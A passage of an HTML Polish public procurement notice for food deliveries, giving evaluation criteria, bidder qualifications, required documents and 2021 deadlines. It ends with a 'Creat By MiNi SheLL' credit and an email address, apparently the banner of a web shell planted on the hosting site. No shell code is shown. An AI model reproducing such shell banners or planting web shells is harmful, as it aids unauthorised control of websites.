pkt;<br/>3) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ)- do 3 godzin od momentu zgłoszenia - 20pkt;<br/>4) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ) – do 4 godzin od momentu zgłoszenia - 10 pkt;<br/>5) Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ) - do 5 godzin od momentu zgłoszenia -0 pkt.<br/>Ocena ofert w oparciu o kryterium czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ ) rozpatrywana będzie na podstawie zadeklarowanego przez Wykonawcę w Formularzu Oferty j/w.<br/>Najkrótszy możliwy czas wymiany towaru na wolny od wad to 1,5 godziny od momentu zgłoszenia.<br/>Najdłuższy możliwy czas wymiany towaru na wolny od wad to 5 godzin od momentu zgłoszenia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wymiany towaru na wolny od wad w przypadku dostarczenia artykułu niezgodnego z zamówieniem (niezgodności ilościowe, jakościowe czy z SWZ )</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa.<br/>a) wykaz dostaw (załącznik nr 7) lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 3 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz dostaw (załącznik nr 7) lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz wykaz dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. <br/>Wykonawca winien w wykazie dostaw przedstawić wykonanie co najmniej jednej dostawy odpowiadającej swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia. Przy czym odpowiednio dla:<br/>Zadanie nr 1 -Dostawa warzyw i owoców świeżych - za cenę łączną minimum 54 718,00 zł. brutto<br/>Zadanie nr 3- Dostawa mięsa i produktów mięsnych -za cenę łączną minimum 13 353,00 zł. brutto<br/> Zadanie nr 4- Dostawa artykułów nabiałowych -za cenę łączną minimum 47 380,00 zł. brutto<br/>Zadanie nr 5- Dostawa różnych artykułów spożywczych -za cenę łączną minimum 36 200,00 zł. brutto<br/>Zadanie nr 6- Dostawa pieczywa -za cenę łączną minimum 12 402,00 zł. brutto <br/>Zadanie nr 7- Dostawa świeżych filetów rybnych -za cenę łączną minimum 6 676,00 zł. brutto</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający dopuszcza rozwiązania równoważne opisywane w Załączniku od nr 4.1;4.3;4.4;4.5;4.6;4.7.do SWZ. Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego, wykaże w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w art. 105–107 Pzp, że proponowane rozwiązania w równoważnym stopniu spełniają wymagania określone w opisie przedmiotu zamówienia.<br/> Wykonawca złoży wówczas wraz z ofertą: <br/>Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych czy certyfikat. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe podlegające uzupełnieniu jak w rozdziale V pkt 5.4 SWZ, zgodnie z art. 107 ust. 2 pzp <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty stanowiący załącznik nr 2 do SWZ.<br/>2. Szczegółowy kosztorys cenowy stanowiący załączniki nr4.1;4.3;4.4;4.5;4.6;4.7. do SWZ.<br/>3. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospo-darczej lub innego właściwego rejestru.<br/>3.1Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 3. -pełnomocnictwo lub inny dokument (np. akt powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w systemie common law, członka rady dyrektorów spółki, a także umowa spółki cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki) potwierdzający umocowanie do reprezentowania Wykonawcy.<br/>3.2 Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt. 16.1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w załączniku nr 1 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-01 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-01 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com